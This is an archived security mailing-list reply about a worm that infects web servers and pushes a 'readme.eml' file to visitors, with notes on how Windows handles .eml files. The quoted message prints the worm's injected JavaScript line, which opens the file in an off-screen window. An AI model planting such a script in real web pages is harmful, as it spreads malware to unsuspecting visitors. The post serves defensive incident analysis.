Re: [unisog] Some more details on the worm

[Jeffrey Altman <jaltman () columbia edu>]

.eml is listed in the Registry as "Microsoft Internet Mail Message"
with Content Type = "message/rfc822".  On my Windows 2000 system this
will result in a program called

  \WINDOWS\system32\thumbvw.exe

being executed using the Apartment threading model.

- Jeff


> When pages are served up by an infected server, it looks as though
> readme.eml is 'attached' to them.  The server attempts to get the client to
> open them through the following bit of code (from the .dll file):
>
> <script language="JavaScript">window.open("readme.eml", null,
> "resizable=no,top=6000,left=6000")</script>
>
> According to Slashdot, this causes the file to be automatically opened and
> executed by the client.  I haven't been able to confirm or deny that (but if
> someone can, please do).
>
> Regards,
> Matt
>
>
> --
> Matt Davis, MCP
> Intermediate Client Server Business Support Analyst
> COUNTRY(SM) Insurance & Financial Services
> 309-821-6288
> mailto:matt.davis () countryfinancial com



 Jeffrey Altman * Sr.Software Designer      C-Kermit 8.0 Beta available
 The Kermit Project @ Columbia University   includes Secure Telnet and FTP
 http://www.kermit-project.org/             using Kerberos, SRP, and 
 kermit-support () kermit-project org          OpenSSL.  SSH soon to follow.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com